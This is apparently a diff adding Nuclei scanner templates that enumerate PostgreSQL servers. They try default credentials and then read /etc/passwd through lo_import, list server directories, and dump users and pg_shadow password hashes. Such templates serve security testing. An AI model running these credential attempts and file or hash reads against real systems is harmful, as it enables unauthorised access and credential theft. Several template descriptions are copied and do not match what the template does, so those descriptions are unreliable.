JS - pgsql

javascript/enumeration/pgsql/pgsql-default-db.yaml

@@ -0,0 +1,49 @@
+id: pgsql-default-db
+
+info:
+  name: Postgresql Default Database - Enumeration
+  author: pussycat0x
+  severity: high
+  description: |
+    Postgresql has a flaw that allows the attacker to login with empty password.
+  reference:
+    - https://www.tenable.com/plugins/nessus/104031
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected = client.ConnectWithDB(Host, Port, User, Pass, Db);
+      connected  ;
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+        - meow
+      database:
+        - foresight
+        - postgres
+        - template0
+        - template1
+        - test
+      password:
+        - postgres
+        -
+    attack: clusterbomb
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+          - "response == true"
+        condition: and

javascript/enumeration/pgsql/pgsql-exp.yaml

@@ -0,0 +1,63 @@
+id: postgresql-exprement
+
+info:
+  name: PGSQL -EXP
+  author: pussycat0x
+  severity: info
+  description: |
+    Read and list the files within the PostgreSQL database,
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      const flread = "SELECT lo_import('/etc/passwd');"
+      for (let i=0; i < 1; i++){
+        connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, flread);
+        const final = to_json(connected) 
+        const parsedData = JSON.parse(final);
+        const loImportValue = parsedData.Rows[0].lo_import;
+        const valtw = "SELECT lo_get(" + loImportValue +");"
+        const qry = [valtw, "SELECT * from pg_largeobject;"];
+          for (const x of qry){
+          connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, x);
+          Export(connected);
+        }  
+
+      }
+
+      
+
+
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"

javascript/enumeration/pgsql/pgsql-file-read.yaml

@@ -0,0 +1,42 @@
+id: postgresql-file-read
+
+info:
+  name: PostgreSQL File Read
+  author: pussycat0x
+  severity: info
+  description: |
+    Read and list the files within the PostgreSQL database,
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
+      Export(connected);
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[].pg_ls_dir'

javascript/enumeration/pgsql/pgsql-list-database.yaml

@@ -0,0 +1,42 @@
+id: postgresql-list-database
+
+info:
+  name: PostgreSQL List Database
+  author: pussycat0x
+  severity: info
+  description: |
+    PostgreSQL List Password Hashes
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
+    - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database");
+      Export(connected);
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[].datname'

javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml

@@ -0,0 +1,42 @@
+id: pgsql-exec
+
+info:
+  name: PostgreSQL List Password Hashes
+  author: pussycat0x
+  severity: info
+  description: |
+    PostgreSQL List Password Hashes
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
+    - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
+      Export(connected)
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[] | "\(.usename) : \(.passwd)"'

javascript/enumeration/pgsql/pgsql-list-users.yaml

@@ -0,0 +1,43 @@
+id: pgsql-list-users
+
+info:
+  name: PostgreSQL List Users
+  author: pussycat0x
+  severity: info
+  description: |
+    Postgresql has a flaw that allows the attacker to login with empty password.
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user");
+      Export(connected);
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+#      Query: "\du"
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[].usename'

javascript/enumeration/pgsql/pgsql-version-detect.yaml

@@ -0,0 +1,43 @@
+id: pgsql-version-detect
+
+info:
+  name: Postgresql Version - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    Postgresql has a flaw that allows the attacker to login with empty password.
+  reference:
+    - https://www.tenable.com/plugins/nessus/104031
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected =  client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();");
+      Export(connected);
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+#      Query: "\du"
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[0].version'

javascript/enumeration/pgsql/postgresql-empty-password.yaml

@@ -0,0 +1,33 @@
+id: postgresql-empty-password
+
+info:
+  name: Postgresql Empty Password - Detect
+  author: pussycat0x
+  severity: high
+  description: |
+    Postgresql has a flaw that allows the attacker to login with empty password.
+  reference:
+    - https://www.tenable.com/plugins/nessus/104031
+  metadata:
+    shodan-query: product:"PostgreSQL"
+  tags: js,network,postgresql
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      const connected = client.Connect(Host, Port, User, Pass);
+      connected;
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "postgres"
+      Pass: "postgres"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+          - "response == true"
+        condition: and